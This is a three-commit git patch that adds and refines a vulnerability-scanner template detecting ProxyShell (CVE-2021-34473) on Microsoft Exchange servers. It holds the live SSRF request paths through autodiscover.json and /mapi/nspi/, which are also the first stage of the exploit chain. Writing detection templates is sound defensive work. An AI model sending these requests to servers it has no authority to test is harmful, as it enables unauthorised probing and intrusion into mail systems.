From 99d41391e72aa8c9b51c47edb60dfeb1f015aa55 Mon Sep 17 00:00:00 2001 From: Paul Werther Date: Tue, 10 Aug 2021 09:59:06 +0200 Subject: [PATCH 1/3] add ProxyShell detection template --- cves/2021/CVE-2021-34473.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2021/CVE-2021-34473.yaml diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml new file mode 100644 index 0000000000..8f5ed21b88 --- /dev/null +++ b/cves/2021/CVE-2021-34473.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-34473 + +info: + name: Exchange Server SSRF (ProxyShell) + author: arcc + severity: critical + description: | + Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. + reference: | + - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 + - https://www.youtube.com/watch?v=FC6iHw258RI + - https://portswigger.net/daily-swig/a-whole-new-attack-surface-researcher-orange-tsai-documents-proxylogon-exploits-against-microsoft-exchange-server + tags: cve,cve2021,ssrf,rce,exchange + +requests: + - method: GET + path: + - "{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" + + matchers: + - type: status + status: + - 302 \ No newline at end of file From ff558bd94edafedd7043ab42906c6035be3aa757 Mon Sep 17 00:00:00 2001 From: Paul Werther Date: Tue, 10 Aug 2021 10:17:37 +0200 Subject: [PATCH 2/3] add second url for more stable detection --- cves/2021/CVE-2021-34473.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index 8f5ed21b88..c7bc47bedc 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -15,7 +15,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com" + - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' + - '{{BaseURL}}/mapi/nspi/?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' matchers: - type: status From 36e43b66ec0e438afa56ec4638e7e06d2491b118 Mon Sep 17 00:00:00 2001 From: Paul Werther Date: Tue, 10 Aug 2021 10:53:58 +0200 Subject: [PATCH 3/3] follow redirect, compare body instead of status code, eliminate false positives --- cves/2021/CVE-2021-34473.yaml | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index c7bc47bedc..d68b694bb0 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -14,11 +14,14 @@ info: requests: - method: GET + redirects: true path: - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' - - '{{BaseURL}}/mapi/nspi/?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' + - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com' matchers: - - type: status - status: - - 302 \ No newline at end of file + - type: word + part: body + words: + - Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException + - Exchange MAPI/HTTP Connectivity Endpoint \ No newline at end of file